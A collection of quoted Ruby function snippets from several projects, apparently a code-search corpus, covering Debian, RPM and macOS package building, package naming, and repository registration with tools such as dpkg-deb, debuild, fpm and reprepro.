"def generate_debian_dir(pkginfo, dir, options)\n options, unknown_options = Kernel.filter_options options,\n :distribution => nil,\n :override_existing => true,\n :patch_dir => nil\n\n distribution = options[:distribution]\n\n # Prepare fields for template\n package_info = pkginfo\n debian_name = debian_name(pkginfo)\n debian_version = debian_version(pkginfo, distribution)\n versioned_name = versioned_name(pkginfo, distribution)\n short_documentation = pkginfo.short_documentation\n documentation = pkginfo.documentation\n origin_information = pkginfo.origin_information\n source_files = pkginfo.source_files\n\n upstream_name = pkginfo.name\n copyright = pkginfo.copyright\n license = pkginfo.licenses\n\n deps = @dep_manager.filtered_dependencies(pkginfo)\n\n #debian names of rock packages\n deps_rock_packages = deps[:rock]\n deps_osdeps_packages = deps[:osdeps]\n deps_nonnative_packages = deps[:nonnative].to_a.flatten.compact\n\n dependencies = (deps_rock_packages + deps_osdeps_packages + deps_nonnative_packages).flatten\n build_dependencies = dependencies.dup\n\n this_rock_release = TargetPlatform.new(rock_release_name, target_platform.architecture)\n @rock_autobuild_deps[pkginfo.build_type].each do |pkginfo|\n name = debian_name(pkginfo)\n build_dependencies << this_rock_release.packageReleaseName(name)\n end\n\n # To handle postinstall\n DEFAULT_BUILD_DEPENDENCIES.each do |dep|\n build_dependencies << dep\n end\n\n DEFAULT_RUNTIME_DEPENDENCIES.each do |dep|\n dependencies << dep\n end\n\n if pkginfo.build_type == :cmake\n build_dependencies << \"cmake\"\n elsif pkginfo.build_type == :orogen\n build_dependencies << \"cmake\"\n orogen_command = pkginfo.orogen_command\n elsif pkginfo.build_type == :autotools\n if pkginfo.using_libtool\n build_dependencies << \"libtool\"\n end\n build_dependencies << \"autotools-dev\" # as autotools seems to be virtual...\n build_dependencies << \"autoconf\"\n build_dependencies << \"automake\"\n build_dependencies << \"dh-autoreconf\"\n elsif pkginfo.build_type == :ruby\n if pkginfo.is_bundle?\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle ruby package\"\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n build_dependencies << \"cmake\"\n else\n raise \"debian/control: cannot handle package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n\n Packager.info \"Required OS Deps: #{deps_osdeps_packages}\"\n Packager.info \"Required Nonnative Deps: #{deps_nonnative_packages}\"\n\n dir = cleanup_existing_dir(dir, options)\n existing_debian_dir = File.join(pkginfo.srcdir,\"debian\")\n template_dir =\n if File.directory?(existing_debian_dir)\n existing_debian_dir\n else\n TEMPLATES\n end\n FileUtils.mkdir_p dir\n\n Find.find(template_dir) do |path|\n next if File.directory?(path)\n template = ERB.new(File.read(path), nil, \"%<>\", path.gsub(/[^w]/, '_'))\n rendered = template.result(binding)\n\n target_path = File.join(dir, Pathname.new(path).relative_path_from(Pathname.new(template_dir)).to_s)\n FileUtils.mkdir_p File.dirname(target_path)\n File.open(target_path, \"w\") do |io|\n io.write(rendered)\n end\n end\n\n if options[:patch_dir]\n whitelist = [ \"debian/rules\",\"debian/control\",\"debian/install\" ]\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: whitelist,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to debian folder of #{pkginfo.name}\"\n end\n end\n\n ########################\n # debian/compat\n ########################\n compatfile = File.join(dir,\"compat\")\n set_compat_level(DEBHELPER_DEFAULT_COMPAT_LEVEL, compatfile)\n end",
"def package_dir_path\n \"#{package_dir}/#{package_name}\"\n end",
"def package_dir\r\n \"${0%/#{target_name}}\"\r\n end",
"def package_dir\n config.package_dir\n end",
"def pkg_dir\n @pkg_dir ||= File.join( self.build_dir, \"#{name + ( version ? \"-#{version}\" : \"\" ) }\" )\n end",
"def make(output_dir)\n create_debian_dir\n\n arch = @config.architecture\n package_name = @config.package + \"_#{@config.full_version}_#{arch}.deb\"\n package_path = Pathname.new(output_dir) + package_name\n\n system(\"fakeroot dpkg-deb -b \\\"#{@config.root}\\\" \\\"#{package_path}\\\"\")\n\n package_path\n end",
"def package_filename\n \"#{@package.name}_#{@package.version}_#{@package.architecture}.deb\"\n end",
"def dmg_dir_path\n \"#{package_dir}/#{dmg_name}\"\n end",
"def target_dir\n without_parent_dir ? \".\" : package_name\n end",
"def package_file\n File.join('/tmp/fpm-recipes/duo-openvpn/pkg',\n case node['platform_family']\n when 'debian'\n \"duo-openvpn_#{version}-#{revision}_amd64.deb\"\n when 'rhel'\n \"duo-openvpn-#{version}-#{revision}.x86_64.rpm\"\n end)\n end",
"def debian_meta_name(name, with_rock_release_prefix = true)\n if with_rock_release_prefix\n rock_release_prefix + \"meta-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"meta-\" + Deb.canonize(name)\n end\n end",
"def package_name\n @package_name ||=\n Pathname(\"#{cartage.final_name}.tar#{cartage.tar_compression_extension}\")\n end",
"def package_meta(name, depend,\n version: \"0.1\",\n force_update: false,\n distribution: nil,\n architecture: nil)\n\n debian_pkg_name = debian_meta_name(name)\n\n if force_update\n dirname = packaging_dir(debian_pkg_name)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n distribution ||= target_platform.distribution_release_name\n architecture ||= target_platform.architecture\n packaging_dir = packaging_dir(debian_pkg_name)\n\n if not File.directory?(packaging_dir)\n FileUtils.mkdir_p packaging_dir\n end\n\n package_deb_meta(name, depend,\n version: version,\n distribution: distribution,\n packaging_dir: packaging_dir)\n end",
"def package(pkginfo, options = Hash.new)\n options, unknown_options = Kernel.filter_options options,\n :force_update => false,\n :patch_dir => nil,\n :distribution => nil, # allow to override global settings\n :architecture => nil\n\n options[:distribution] ||= target_platform.distribution_release_name\n options[:architecture] ||= target_platform.architecture\n\n debian_pkg_name = debian_name(pkginfo)\n\n if options[:force_update]\n dirname = packaging_dir(pkginfo)\n if File.directory?(dirname)\n Packager.info \"Debian: rebuild requested -- removing #{dirname}\"\n FileUtils.rm_rf(dirname)\n end\n end\n\n options[:packaging_dir] = packaging_dir(pkginfo)\n options[:release_name] = rock_release_name\n\n begin\n # Set the current pkginfo to set the install directory\n # correctly\n # FIXME: needs to be refactored\n #\n @packager_lock.lock\n @current_pkg_info = pkginfo\n\n pkginfo = prepare_source_dir(pkginfo, options.merge(unknown_options))\n\n if pkginfo.build_type == :orogen || pkginfo.build_type == :cmake || pkginfo.build_type == :autotools\n package_default(pkginfo, options)\n elsif pkginfo.build_type == :ruby\n # Import bundles since they do not need to be build and\n # they do not follow the typical structure required for gem2deb\n if pkginfo.name =~ /bundles/\n package_importer(pkginfo, options)\n else\n package_ruby(pkginfo, options)\n end\n elsif pkginfo.build_type == :archive_importer || pkginfo.build_type == :importer_package\n package_importer(pkginfo, options)\n else\n raise ArgumentError, \"Debian: Unsupported package type #{pkginfo.build_type} for #{pkginfo.name}\"\n end\n ensure\n @current_pkg_info = nil\n @packager_lock.unlock\n end\n end",
"def package_manifest()\n res = []\n @items.each do |item|\n sources = item[:sources]\n sources = [ sources ] unless sources.kind_of?(Array)\n sources.each do |src|\n # TODO - want to split into multiple packages\n #if pkg == :main\n # next unless item[:dest] =~ /(LIB|BIN)DIR/\n #elsif pkg == :devel\n # next unless item[:dest] =~ /(INCLUDE|MAN)DIR/\n #else\n # throw \"bad pkg type\"\n #end\n dst = expand_dir(item[:dest])\n if item[:rename].nil?\n dst += '/' + src\n else\n dst += '/' + item[:rename]\n end\n dst.gsub!(/^\\/usr\\/local\\//, '/usr/') # KLUDGE: only true when making an RPM or DEB\n res.push dst\n end\n end\n res.join \"\\n\"\n end",
"def pathDist\n\t\"../../\" + distPackageName + \"_\" + version + \"/\"\nend",
"def get_extract_dir(pkg, version, update)\n dir = \"#{pkg == 'jre' ? 'jre' : 'jdk'}1.#{version}.0#{update.empty? ? '' : '_'+update}\"\n Chef::Log.info(\"Java package expanded dir: #{dir}\")\n dir\n end",
"def debian_name(pkg)\n if pkg.kind_of?(Autoproj::RubyPackage)\n debian_ruby_name(pkg.name)\n else\n \"rock-\" + canonize(pkg.name)\n end\n end",
"def pkg_dir=( pd )\n @pkg_dir = File.join( self.build_dir, pd )\n end",
"def package_build!(tmp_dir)\n # copying template files\n FileUtils.cp_r(File.expand_path(File.join(File.dirname(__FILE__), \"debian\")), tmp_dir)\n Dir.chdir(tmp_dir) do\n ppath = File.join(\"..\", self.package_filename)\n File.delete(ppath) if File.exists? ppath\n deb_files = File.join(\"..\", \"#{@package.name}_#{@package.version}*\")\n res = run_dpkg tmp_dir, @package.gpg_key \n if res or File.exists? ppath \n # mv can raise\n FileUtils.mv(Dir.glob(deb_files) , @dest_dir, :force => true)\n else\n ActiveRecord::Base.logger.debug \"Dpkg-buildpackage failed\"\n raise \"dpkg-buildpackage failed\"\n end\n end\n end",
"def tar_path\n File.expand_path(@env[\"package.output\"], FileUtils.pwd)\n end",
"def directory\n return _meta_data['directory'] if _meta_data.has_key? 'directory'\n dir\n end",
"def dmg_package_app\n case new_resource.source\n when :direct\n ::File.basename(package_metadata[:url], '.dmg')\n else\n ::File.basename(new_resource.source.to_s, '.dmg')\n end\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n \"#{package_name}-#{build_version}_#{iteration}.sh\"\n when 'msi'\n Packager::WindowsMsi.new(self).package_name\n when 'bff'\n \"#{package_name}.#{bff_version}.bff\"\n when 'pkgmk'\n \"#{package_name}-#{build_version}-#{iteration}.solaris\"\n when 'mac_pkg'\n Packager::MacPkg.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::MacPkg.new(self)\n Packager::MacDmg.new(pkg).package_name\n else # fpm\n require \"fpm/package/#{pkg_type}\"\n pkg = FPM::Package.types[pkg_type].new\n pkg.version = build_version\n pkg.name = package_name\n pkg.iteration = iteration\n if pkg_type == 'solaris'\n pkg.to_s('NAME.FULLVERSION.ARCH.TYPE')\n else\n pkg.to_s\n end\n end\n end",
"def update_debian_dir(pkginfo, options)\n # Generate the debian directory\n generate_debian_dir(pkginfo, pkginfo.srcdir, options)\n\n if options[:patch_dir] && File.exist?(options[:patch_dir])\n if patch_pkg_dir(pkginfo.name, options[:patch_dir],\n whitelist: nil,\n pkg_dir: pkginfo.srcdir,\n options: patch_options())\n Packager.warn \"Overlay patch applied to #{pkginfo.name}\"\n end\n Dir.chdir(pkginfo.srcdir) do\n process_apaka_control(\"apaka.control\")\n end\n end\n\n dpkg_commit_changes(\"overlay\", pkginfo.srcdir,\n logfile: options[:logfile],\n include_removal: true)\n\n envyml = File.join(pkginfo.srcdir, \"env.yml\")\n Packager.warn(\"Preparing env.yml #{envyml}\")\n patch_yml = {}\n if File.exists?(envyml)\n patch_yml = YAML.load_file(envyml)\n end\n\n env_data = pkginfo.generate_env_data(\"APAKA__\" + Packaging.as_var_name(pkginfo.name), rock_install_directory, base_data: patch_yml)\n File.open(envyml, \"w\") do |file|\n file.write(env_data.to_yaml)\n end\n dpkg_commit_changes(\"envyml\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n envsh = File.join(pkginfo.srcdir, \"env.sh\")\n Packager.warn(\"Preparing env.sh #{envsh}\")\n File.open(envsh, \"a\") do |file|\n env_txt = pkginfo.envsh(env_data)\n file.write(env_txt)\n end\n dpkg_commit_changes(\"envsh\", pkginfo.srcdir,\n logfile: options[:logfile])\n\n\n # Run dpkg-source\n # Use the new tar ball as source\n if !system(\"dpkg-source\", \"-I\", \"-b\", pkginfo.srcdir,\n [:out, :err] => redirection(options[:logfile],\"a\"),\n :close_others => true)\n Packager.warn \"Package: #{pkginfo.name} failed to perform dpkg-source -- #{Dir.entries(pkginfo.srcdir)}\"\n raise RuntimeError, \"Debian: #{pkginfo.name} failed to perform dpkg-source in #{pkginfo.srcdir}\"\n end\n [\"#{versioned_name(pkginfo, options[:distribution])}.debian.tar.gz\",\n \"#{plain_versioned_name(pkginfo)}.orig.tar.gz\",\n \"#{versioned_name(pkginfo, options[:distribution])}.dsc\"]\n end",
"def build_local(pkg_name, debian_pkg_name, versioned_build_dir, deb_filename, options)\n options, unknown_options = Kernel.filter_options options,\n :distributions => nil,\n :parallel_build_level => nil\n filepath = build_dir\n # cd package_name\n # tar -xf package_name_0.0.debian.tar.gz\n # tar -xf package_name_0.0.orig.tar.gz\n # mv debian/ package_name_0.0/\n # cd package_name_0.0/\n # debuild -us -uc\n # #to install\n # cd ..\n # sudo dpkg -i package_name_0.0.deb\n Packager.info \"Building #{pkg_name} locally with arguments: pkg_name #{pkg_name},\" \\\n \" debian_pkg_name #{debian_pkg_name},\" \\\n \" versioned_build_dir #{versioned_build_dir}\" \\\n \" deb_filename #{deb_filename}\" \\\n \" options #{options}\"\n\n begin\n FileUtils.chdir File.join(build_dir, debian_pkg_name, target_platform.to_s.gsub(\"/\",\"-\")) do\n if File.exist? \"debian\"\n FileUtils.rm_rf \"debian\"\n end\n if File.exist? versioned_build_dir\n FileUtils.rm_rf versioned_build_dir\n end\n FileUtils.mkdir versioned_build_dir\n\n debian_tar_gz = Dir.glob(\"*.debian.tar.gz\")\n debian_tar_gz.concat Dir.glob(\"*.debian.tar.xz\")\n if debian_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.debian.tar.gz in #{Dir.pwd}\"\n else\n debian_tar_gz = debian_tar_gz.first\n cmd = [\"tar\", \"-xf\", debian_tar_gz]\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n orig_tar_gz = Dir.glob(\"*.orig.tar.gz\")\n if orig_tar_gz.empty?\n raise RuntimeError, \"#{self} could not find file: *.orig.tar.gz in #{Dir.pwd}\"\n else\n orig_tar_gz = orig_tar_gz.first\n cmd = [\"tar\"]\n cmd << \"-x\" << \"--strip-components=1\" <<\n \"-C\" << versioned_build_dir <<\n \"-f\" << orig_tar_gz\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd.join(\" \")}' failed\"\n end\n end\n\n FileUtils.mv 'debian', versioned_build_dir + '/'\n FileUtils.chdir versioned_build_dir do\n cmd = [\"debuild\", \"-us\", \"-uc\"]\n if options[:parallel_build_level]\n cmd << \"-j#{options[:parallel_build_level]}\"\n end\n if !system(*cmd, :close_others => true)\n raise RuntimeError, \"Packager: '#{cmd}' failed\"\n end\n end\n\n filepath = Dir.glob(\"*.deb\")\n if filepath.size < 1\n raise RuntimeError, \"No debian file generated in #{Dir.pwd}\"\n elsif filepath.size > 1\n raise RuntimeError, \"More than one debian file available in #{Dir.pwd}: #{filepath}\"\n else\n filepath = filepath.first\n end\n end\n rescue Exception => e\n msg = \"Package #{pkg_name} has not been packaged -- #{e}\"\n Packager.error msg\n raise RuntimeError, msg\n end\n filepath\n end",
"def pkg_path\n \"pkg/#{spec.full_name}\"\n end",
"def build\n @log.info \"Packaging files\"\n pkgdir = File.join(@path, \"pkg\")\n FileUtils.mkdir_p pkgdir\n\n FileUtils.chmod(0755, Dir[\"#{Ian.debpath(@dir)}/*\"])\n FileUtils.chmod(0755, Ian.debpath(@dir))\n\n pkg = File.join(pkgdir, \"#{pkgname}.deb\")\n output = %x[fakeroot dpkg-deb -b #{@dir} #{pkg}]\n\n return [$?.success?, pkg, output]\n end",
"def package_name\n name = package_drop_last(slug_parts)\n name.empty? ? '_root_' : name\n end",
"def generate_from_directory_package(location)\n files = []\n\n # package files\n package_info = Package::PackageScanner.scan(location)\n files << \"pione-package.json\"\n files += package_info.filepaths\n\n # scenario files\n scenario_infos = package_info.scenarios.map do |scenario|\n files << File.join(scenario, \"pione-scenario.json\")\n files += Package::ScenarioScanner.scan(location + scenario).filepaths.map do |path|\n File.join(scenario, path)\n end\n end\n\n # make seed string for digest\n seed = files.sort.each_with_object(\"\") do |filepath, string|\n digest = Digest::MD5.file((location + filepath).path).to_s\n string << \"%s %s\\n\" % [filepath, digest]\n end\n\n return Digest::MD5.hexdigest(seed)\n end",
"def generate_pkg_contents\n shellout!(\"pkgsend generate #{source_dir} | pkgfmt > #{pkg_manifest_file}.1\")\n shellout!(\"pkgmogrify -DARCH=`uname -p` #{pkg_manifest_file}.1 #{pkg_metadata_file} #{transform_file} | pkgfmt > #{pkg_manifest_file}.2\")\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def source_package_dir\n Settings.source_dir #% [@program, @version]\n end",
"def nuget_directory()\r\n dirs = FileList.new([:lib, :content, :tools].collect{ |dir|\r\n File.join(Folders[:nuspec], \"#{dir}\")\r\n })\r\n task :nuget_dirs => dirs # NOTE: here a new dynamic task is defined\r\n\tdirs.to_a.each{ |d| directory d }\r\n end",
"def get_java_pkg_location\n cookbook = node.app_name.downcase\n base_url = get_mirror_svc('jdk')\n\n version = node.java.version\n update = get_update_ver\n pkg = node.java.jrejdk\n extn = get_pkg_extn\n artifact = \"#{version}u#{update}-linux\"\n\n # Replace any $version/$flavor/$jrejdk placeholder variables present in the URL\n # e.x: http://<mirror>/some/path/$flavor/$jrejdk/$version/$jrejdk-$version-$arch.$extn\n base_url = base_url.gsub('$version', artifact)\n .gsub('$jrejdk', pkg)\n .gsub('$flavor', node[cookbook][:flavor])\n .gsub('$arch', node.java.arch)\n .gsub('$extn', extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n if base_url.end_with? (extn)\n # Got full mirror url with file name.\n file_name = File.basename(URI.parse(base_url).path)\n base_url = File.dirname(base_url)\n else\n # Use JDK file name convention.\n file_name = \"#{pkg}-#{artifact}-#{node.java.arch}.#{extn}\"\n end\n\n Chef::Log.info(\"Package url: #{base_url}/#{file_name}\")\n extract_dir = get_extract_dir(pkg, version, update)\n return base_url, file_name, extract_dir\n\n end",
"def default_dev_package\n # Check for an override.\n return dev_package_overrides[package_name] if dev_package_overrides.include?(package_name)\n suffix = node.value_for_platform_family(debian: '-dev', rhel: '-devel', fedora: '-devel')\n # Platforms like Arch and Gentoo don't need this anyway. I've got no\n # clue how Amazon Linux does this.\n if suffix\n package_name + suffix\n else\n nil\n end\n end",
"def gen_dir\n File.join(root_path, 'generated')\n end",
"def debian_name(pkginfo, with_rock_release_prefix = true, release_name = nil)\n if pkginfo.kind_of?(String)\n raise ArgumentError, \"method debian_name expects a PackageInfo as argument, got: #{pkginfo.class} '#{pkginfo}'\"\n end\n name = pkginfo.name\n\n debianize_name(name,\n build_type: pkginfo.build_type,\n with_rock_release_prefix: with_rock_release_prefix,\n release_name: release_name)\n end",
"def _DISTFILESDIR; Config._DISTFILES; end",
"def pkg_metadata_file\n @pkg_metadata_file ||= File.join(staging_dir, \"gen.manifestfile\")\n end",
"def output_package(pkg_type)\n case pkg_type\n when 'makeself'\n Packager::Makeself.new(self).package_name\n when 'msi'\n Packager::MSI.new(self).package_name\n when 'bff'\n Packager::BFF.new(self).package_name\n when 'solaris'\n Packager::Solaris.new(self).package_name\n when 'pkg'\n Packager::PKG.new(self).package_name\n when 'mac_dmg'\n pkg = Packager::PKG.new(self)\n Packager::MacDmg.new(pkg).package_name\n when 'rpm'\n Packager::RPM.new(self).package_name\n when 'deb'\n Packager::DEB.new(self).package_name\n else\n raise RuntimeError, \"I do not know how to build a `#{pkg_type}'!\"\n end\n end",
"def pkg_manifest_file\n @pkg_manifest_file ||= File.join(staging_dir, \"#{safe_base_package_name}.p5m\")\n end",
"def debianize_name(name, build_type: :cmake, with_rock_release_prefix: true, release_name: rock_release_name)\n if build_type == :ruby\n if with_rock_release_prefix\n rock_release_prefix(release_name) + \"ruby-\" + Deb.canonize(name)\n else\n pkg_prefix_base + \"-ruby-\" + Deb.canonize(name)\n end\n else\n if with_rock_release_prefix\n rock_release_prefix(release_name) + Deb.canonize(name)\n else\n pkg_prefix_base + \"-\" + Deb.canonize(name)\n end\n end\n end",
"def register_debian_package(debian_pkg_file, release_name, codename, force = false)\n begin\n reprepro_dir = File.join(deb_repository, release_name)\n\n debian_package_dir = File.dirname(debian_pkg_file)\n debfile = File.basename(debian_pkg_file)\n debian_pkg_name = debfile.split(\"_\").first\n logfile = File.join(log_dir,\"#{debian_pkg_name}-reprepro.log\")\n\n if force\n deregister_debian_package(debian_pkg_name, release_name, codename, true)\n end\n @reprepro_lock.lock\n Dir.chdir(debian_package_dir) do\n if !File.exists?(debfile)\n raise ArgumentError, \"Apaka::Packaging::register_debian_package: could not find '#{debfile}' in directory: '#{debian_package_dir}'\"\n end\n\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedeb\" << codename << debfile\n\n Packager.info \"Register deb file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n\n if not reprepro_has_dsc?(debian_pkg_name, release_name, codename, true)\n dscfile = Dir.glob(\"*.dsc\").first\n cmd = [reprepro_bin]\n cmd << \"-V\" << \"-b\" << reprepro_dir <<\n \"includedsc\" << codename << dscfile\n Packager.info \"Register dsc file: #{cmd.join(\" \")} &>> #{logfile}\"\n if !system(*cmd, [:out, :err] => [logfile, \"a\"], :close_others => true)\n raise RuntimeError, \"Execution of #{cmd.join(\" \")} failed -- see #{logfile}\"\n end\n end\n end\n ensure\n @reprepro_lock.unlock\n end\n end",
"def tailor_package_to_platform\n @package.app('Dropbox')\n @package.volumes_dir('Dropbox Installer')\n @package.source(URI.encode(\"file://#{download_dest}\"))\n end",
"def simp_target_dir(subdir=File.join('simp','modules'))\n install_target = puppet_codedir\n\n if install_target.empty?\n fail('Error: Could not find a Puppet code directory for installation')\n end\n\n install_target = File.join(install_target,'environments', subdir)\n\n return install_target\nend",
"def build_package_tasks(config)\n # The name of the task to build the package\n package_task_name = \"build_#{config[:package_name]}\"\n\n # Add task name to the list of dependencies for the :deb_packages task\n task :deb_packages => package_task_name\n\n # The path to the package source directory\n pkg_src_dir = File.join(PACKAGE_CONSTRUCTION_DIR, source_dir_name(config))\n\n # Directory task to ensure the existence of the directory\n directory pkg_src_dir\n\n # Create the tarball task\n orig_source_tarball_path = File.join(PACKAGE_CONSTRUCTION_DIR, \"#{orig_tar_ball_name(config)}.orig.tar.gz\")\n\n # The File task to construct the original source tarball.\n file orig_source_tarball_path => PACKAGE_CONSTRUCTION_DIR do\n system \"tar zcf #{orig_source_tarball_path} --directory #{PACKAGE_CONSTRUCTION_DIR} #{source_dir_name(config)}\"\n end\n\n # The path to the debian directory within the extracted source directory\n package_debian_path = File.join(pkg_src_dir, 'debian')\n\n # Directory task to the package debian path to ensure existence.\n directory package_debian_path\n\n # The task that actually constructs the debian package\n task package_task_name => orig_source_tarball_path do\n # Build the spanky little thing.\n debuild_flag = ENV['debuild'] || 'true'\n if debuild_flag == 'true'\n system \"cd #{pkg_src_dir}; debuild -us -uc\"\n else\n puts \"Skipping build; debug flag was set\"\n end\n end\n\n # Ensure we have set up the tasks for all the files to be included\n # in the package.\n config[:exes].each do | exe_name |\n exe_path = File.join(pkg_src_dir, exe_name.split('.').first)\n file exe_path => pkg_src_dir do\n cp exe_name, exe_path\n end\n\n # Add the file path as a dependency of the source tarball\n task orig_source_tarball_path => exe_path\n end\n\n # Create the task to populate the debian directory\n debian_task = \"populate_#{config[:package_name]}_debian_files\"\n task debian_task => package_debian_path do\n cp_r \"package_source/#{config[:package_name]}/debian\", pkg_src_dir\n end\n\n # Finally add the debian task as a dependency for the package task.\n task package_task_name => debian_task\nend",
"def tar_gz_file\n \"#{package_name}.tar.gz\"\n end",
"def directory_name\n \n directory_name = ''\n if self.pcb_revision != ''\n directory_name = 'pcb' \n directory_name += self.pcb_prefix + '_' \n directory_name += self.pcb_number + '_'\n directory_name += self.pcb_dash_number + '_'\n directory_name += self.pcb_revision\n end\n \n return directory_name\n \n end",
"def pkg_cmd; \"#{pkg_binary}\" end",
"def apt_packages\n PRE_INSTALLED_OS_PACKAGES[@app.release].join(\" #{NL_TAB}\")\n end",
"def build_pkg(dist, arch, deps)\n start_dir = Dir.pwd\n build_dir = \"/tmp/rhobuild\"\n version = Rhoconnect::VERSION\n description = '\"Rhoconnect production environment\"'\n prefix = \"/opt/rhoconnect/installer\"\n gem_name = \"rhoconnect-#{version}.gem\"\n\n before_install_script = \"#{build_dir}/unix-like/pre_install.sh\"\n after_install_script = \"#{build_dir}/unix-like/post_install.sh\"\n before_remove_script = \"#{build_dir}/unix-like/pre_uninstall.sh\"\n after_remove_script = \"#{build_dir}/unix-like/post_uninstall.sh\"\n\n `rm -rf #{build_dir}` if File.exist?(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}\")\n Dir.mkdir(\"#{build_dir}/unix-like\")\n\n # Copy all necessary Files into the build_dir\n system(\"cp install.sh Gemfile Gemfile.lock #{build_dir}\")\n system(\"cp -r installer/unix-like/*.sh #{build_dir}/unix-like\")\n system(\"cp -r installer/unix-like/*.rb #{build_dir}/unix-like\")\n system(\"cp pkg/#{gem_name} #{build_dir}\")\n\n # cd into the pkg dir so that fpm will create the package into the pkg dir.\n Dir.chdir(\"./pkg\") # it created by build task and should already exist\n\n # Construct fpm command\n fpm_cmd = \"fpm -s dir -t #{dist} -n rhoconnect -v #{version} -a #{arch} -C #{build_dir} --epoch 1 \" +\n \"--before-install #{before_install_script} --after-install #{after_install_script} \" +\n \"--before-remove #{before_remove_script} --after-remove #{after_remove_script} \" +\n \"--prefix #{prefix} --description #{description}\"\n # Add the list of dependencies to the fpm call\n deps.each { |dep| fpm_cmd << \" -d '#{dep}'\" }\n fpm_cmd << \" './'\"\n # Create the package\n system(fpm_cmd)\n # Leave no trace...\n system(\"rm -rf #{build_dir}\")\n Dir.chdir(start_dir)\nend",
"def package_path(extension='.gem')\n File.join(package_dir, package_basename(extension))\n end",
"def gen_dir(gendir)\n @recipe.gen_dir(gendir.to_s)\n end",
"def package_conf_file(conf_type, name)\n conf_dir = \"/etc/portage/package.#{conf_type}\"\n raise Chef::Exceptions::Package, \"#{conf_type} should be a directory.\" unless ::File.directory?(conf_dir)\n\n package_atom = name.strip.split(/\\s+/).first\n package_file = package_atom.gsub(/[\\/\\.]/, \"-\").gsub(/[^a-z0-9_\\-]/i, \"\")\n return \"#{conf_dir}/chef.#{package_file}\"\n end",
"def public_filename\n \"/packages/#{environment_id}/#{unit_id}/#{installer_item_location}\"\n end",
"def create_directory_cache(ppg_location)\n digest = Util::PackageDigest.generate(ppg_location)\n cache_location = Global.directory_package_cache_directory + digest\n unless cache_location.exist?\n PackageExpander.new(ppg_location).expand(cache_location)\n end\n return digest\n end",
"def get_pkg_location(cookbook)\n\n version = node.etcd.version\n base_url = get_mirror_svc('etcd')\n Chef::Log.info(\"Etcd base_url: #{base_url}\")\n\n # Replace any $version/$arch/$extn placeholder variables present in the URL\n # e.x: https://github.com/coreos/etcd/releases/download/v$version/etcd-v$version-$arch.$extn\n base_url = base_url.gsub('$version', version)\n .gsub('$arch', node.etcd.arch)\n .gsub('$extn', node.etcd.extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n file_name = File.basename(URI.parse(base_url).path)\n Chef::Log.info(\"Package url: #{base_url}, filename: #{file_name}\")\n return File.dirname(base_url), file_name\n\n end",
"def get_pkg_location(cookbook)\n\n version = node.etcd.version\n base_url = get_mirror_svc('etcd')\n Chef::Log.info(\"Etcd base_url: #{base_url}\")\n\n # Replace any $version/$arch/$extn placeholder variables present in the URL\n # e.x: https://github.com/coreos/etcd/releases/download/v$version/etcd-v$version-$arch.$extn\n base_url = base_url.gsub('$version', version)\n .gsub('$arch', node.etcd.arch)\n .gsub('$extn', node.etcd.extn)\n exit_with_err(\"Invalid package base URL: #{base_url}\") unless url_valid?(base_url)\n\n file_name = File.basename(URI.parse(base_url).path)\n Chef::Log.info(\"Package url: #{base_url}, filename: #{file_name}\")\n return File.dirname(base_url), file_name\n\n end",
"def path_from_package(package_name)\n ret = package_from_name package_name\n ret && ret.root_path\n end",
"def prepare_source_dir(orig_pkginfo, options = Hash.new)\n pkginfo = orig_pkginfo.dup\n\n options, unknown_options = Kernel.filter_options options,\n :existing_source_dir => nil,\n :packaging_dir => File.join(@build_dir, debian_name(pkginfo))\n\n pkg_dir = options[:packaging_dir]\n if not File.directory?(pkg_dir)\n FileUtils.mkdir_p pkg_dir\n end\n\n # Only when there is no importer or when the VCS supports distribution (here git)\n # then we allow to use the local version\n support_local_import = false\n if !pkginfo.importer_type || pkginfo.importer_type == :git\n Packager.info \"Import from local repository is supported for #{pkginfo.name}\"\n support_local_import = true\n else\n Packager.info \"Import from local repository is not supported for #{pkginfo.name}\"\n end\n\n Packager.debug \"Preparing source dir #{pkginfo.name}\"\n # If we have given an existing source directory we should use it, \n # but only if it is a git repository\n pkg_target_importdir = File.join(pkg_dir, plain_dir_name(pkginfo))\n if support_local_import && existing_source_dir = options[:existing_source_dir]\n import_from_local_src_dir(pkginfo, existing_source_dir, pkg_target_importdir)\n # update to the new srcdir\n pkginfo.srcdir = pkg_target_importdir\n else\n pkginfo.import(pkg_target_importdir)\n end\n # remove these even on fresh imports. some repositories\n # have prepopulated build directories and similar\n remove_excluded_dirs(pkg_target_importdir)\n remove_excluded_files(pkg_target_importdir)\n\n pkginfo\n end",
"def dsym_path\n Dir[BuildCommandGenerator.archive_path + \"/**/*.dsym\"].last\n end",
"def staging_dir\n File.expand_path(\"#{Config.package_tmp}/#{underscore_name}\")\n end",
"def bundled_designs_dir\n Ziya.path( %w[gauges designs] )\n end",
